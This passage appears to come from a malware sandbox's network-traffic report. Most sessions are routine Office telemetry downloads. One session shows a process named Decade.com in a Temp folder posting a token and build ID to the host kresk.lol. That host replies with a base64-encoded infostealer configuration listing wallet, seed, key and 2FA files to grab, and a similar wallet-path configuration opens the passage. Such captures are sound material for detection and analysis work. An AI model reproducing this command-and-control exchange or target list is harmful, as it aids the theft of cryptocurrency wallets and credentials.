8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:47 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:47 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: f7184125-501e-0064-68d4-451f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111747Z-1746fd949bdb8xvchC1EWRmbd4000000012g000000004nav x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:47 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:47 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:47 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: e40b0455-101e-008e-19d2-45cf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111747Z-1746fd949bdb8xvchC1EWRmbd400000000y000000000a3ty x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:47 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:47 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:47 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 8863b02e-001e-008d-5ccb-45d91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111747Z-1746fd949bdlnsqphC1EWRurw000000000vg000000009b1a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:47 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49879	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:49 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:49 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:49 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111749Z-1746fd949bdl6zq5hC1EWRf3ws00000000q0000000008u7k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:49 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49878	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:49 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:49 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:49 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111749Z-1746fd949bdwt8wrhC1EWRu6rg0000000150000000008y7t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:49 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49881	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:49 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:49 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:49 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111749Z-1746fd949bdmv56chC1EWRypnn000000019g000000003r24 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:49 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49880	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:49 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:49 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:49 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111749Z-1746fd949bdfg4slhC1EWR34t0000000013g0000000003pm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:49 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	49883	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:49 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GVAAAAAIE3WBIEKNGV37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 56 41 41 41 41 41 49 45 33 57 42 49 45 4b 4e 47 56 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 41 41 41 41 49 45 33 57 42 49 45 4b 4e 47 56 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 41 41 41 41 49 45 33 57 42 49 45 4b 4e 47 56 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------GVAAAAAIE3WBIEKNGV37Content-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------GVAAAAAIE3WBIEKNGV37Content-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------GVAAAAAIE3WBIEKNGV37Cont
2024-12-04 11:17:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:50 UTC	2208	IN	Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49882	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:49 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:49 UTC	515	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:49 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111749Z-1746fd949bdxk6n6hC1EWRdr8c000000011g000000001ycf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-04 11:17:49 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49884	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:51 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:51 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:51 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111751Z-1746fd949bdxk6n6hC1EWRdr8c00000000vg0000000094a0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:51 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:51 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:51 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:51 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111751Z-1746fd949bddtfvqhC1EWRxbpg000000011000000000600c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:51 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

